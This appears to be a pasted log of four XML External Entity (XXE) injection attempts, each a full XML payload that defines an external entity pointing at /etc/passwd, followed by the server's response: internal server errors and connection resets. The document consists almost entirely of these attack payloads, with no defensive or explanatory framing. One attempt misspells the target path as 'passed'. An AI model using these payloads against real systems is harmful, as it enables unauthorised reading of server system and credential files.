Try 1: generates internal server error:<?xml version="1.0" encoding="UTF-8"?>

1. Try 1: generates internal server error:
2. <?xml version="1.0" encoding="UTF-8"?>
3. <!DOCTYPE foo [
4. <!ELEMENT foo ANY>
5. <!ENTITY xxe SYSTEM "file:///etc/passwd">
6. ]>
7. <book>
8. <author>&xxe;</author>
9. <subject>mypass</subject>
10. <content>blah</content>
11. </book>
12.  
13. try2: error returned saying connection was reset:
14. <?xml version="1.0" encoding="UTF-8"?>
15. <!DOCTYPE foo [
16. <!ELEMENT foo ANY>
17. <!ENTITY xxe SYSTEM "file:///etc/passwd">
18. ]>
19. <foo>
20. <author>&xxe;</author>
21. <subject>mypass</subject>
22. <content>blah</content>
23. </foo>
24.  
25. try3: generates internal server error:
26. <?xml version="1.0" encoding="UTF-8"?>
27. <!DOCTYPE book [
28. <!ELEMENT book (author,subject,content)>
29. <!ELEMENT author (#PCDATA)>
30. <!ELEMENT subject (#PCDATA)>
31. <!ELEMENT content (#PCDATA)>
32. <!ENTITY xxe SYSTEM "file:///etc/passwd">
33. ]>
34. <book>
35. <author>&xxe;</author>
36. <subject>xml</subject>
37. <content>exploit</content>
38. </book>
39.  
40. try4: generates a page was reset
41. <?xml version="1.0" encoding="UTF-8"?>
42. <!DOCTYPE foo [
43. <!ELEMENT foo ANY>
44. <!ELEMENT author ANY>
45. <!ELEMENT subject ANY>
46. <!ELEMENT content ANY>
47. <!ENTITY xxe SYSTEM "file:///etc/passed">
48. ]>
49. <foo>
50. <author>&xxe;</author>
51. <subject>mypass</subject>
52. <content>blah</content>
53. </foo>